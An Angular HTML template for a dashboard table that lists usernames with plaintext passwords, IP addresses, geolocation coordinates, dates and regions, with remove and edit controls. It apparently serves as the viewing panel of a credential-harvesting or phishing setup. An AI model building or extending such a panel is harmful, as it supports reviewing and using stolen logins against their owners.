<marquee
  behavior=""
  class="bg-green-500 py-2 uppercase font-mono font-bold shadow-xl"
  direction="left"
  >Latest details will appear on top
</marquee>

<div class="relative overflow-x-auto shadow-md sm:rounded-lg">
  <table class="w-full text-sm text-left text-gray-500 dark:text-gray-400">
    <thead
      class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400"
    >
      <tr>
        <th scope="col" class="p-4">
          <div class="flex items-center">S/N</div>
        </th>
        <th scope="col" class="px-6 py-3">Username</th>
        <th scope="col" class="px-6 py-3">password</th>
        <th scope="col" class="px-6 py-3">ip address</th>
        <th scope="col" class="px-6 py-3">country</th>
        <th scope="col" class="px-6 py-3">city</th>
        <th scope="col" class="px-6 py-3">coordinate</th>
        <th scope="col" class="px-6 py-3">date</th>
        <th scope="col" class="px-6 py-3">region</th>
        <th scope="col" class="px-6 py-3">Action</th>
      </tr>
    </thead>
    <tbody>
      <tr
        class="bg-white border-b hover:bg-gray-50 font-medium"
        *ngFor="let detail of details; let i = index"
      >
        <td class="w-4 p-4">
          <div class="flex items-center">
            {{ i + 1 }}
          </div>
        </td>
        <th
          scope="row"
          class="px-6 py-4 font-medium text-gray-900 whitespace-nowrap dark:text-white"
        >
          {{ detail.username }}
        </th>
        <td class="px-6 py-4">{{ detail.password }}</td>
        <td class="px-6 py-4">{{ detail.ip }}</td>
        <td class="px-6 py-4">{{ detail.country }}</td>
        <td class="px-6 py-4">{{ detail.city }}</td>
        <td class="px-6 py-4">{{ detail.loc }}</td>
        <td class="px-6 py-4">{{ detail.date }}</td>
        <td class="px-6 py-4">{{ detail.region }}</td>
        <td class="flex items-center px-6 py-4 space-x-3">
          <button
            href="#"
            class="font-medium text-red-600 dark:text-red-500 hover:underline"
            (click)="del(i)"
          >
            Remove
          </button>
        </td>
      </tr>
    </tbody>
  </table>
</div>

<a
  class="fixed bottom-8 right-8 md:bottom-16 md:right-14 bg-green-500 text-white px-2 py-3 rounded-lg"
  href="/edit"
>
  Edit Details
</a>
